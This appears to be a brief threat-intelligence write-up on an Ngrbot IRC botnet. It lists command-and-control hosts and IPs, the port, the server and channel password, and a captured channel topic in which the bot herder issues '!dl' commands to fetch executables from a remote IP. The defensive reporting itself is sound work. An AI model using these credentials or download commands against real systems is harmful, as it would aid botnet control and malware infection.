t.baerr01.com (Ngrbot IRC botnet hosted by Chinanet)

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187

Server:  t.baerr01.com
Port:  6512
Server password:  smart
Channel:  #dpi
:hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel:  #tar
Channel password:  smart

A modified ircd is used, making it difficult to connect with a regular IRC client.

Related MD5s (search on malwr.com to download the samples):
ngrbot: 1704b32f095bffb55c6c0a01f48a83ae
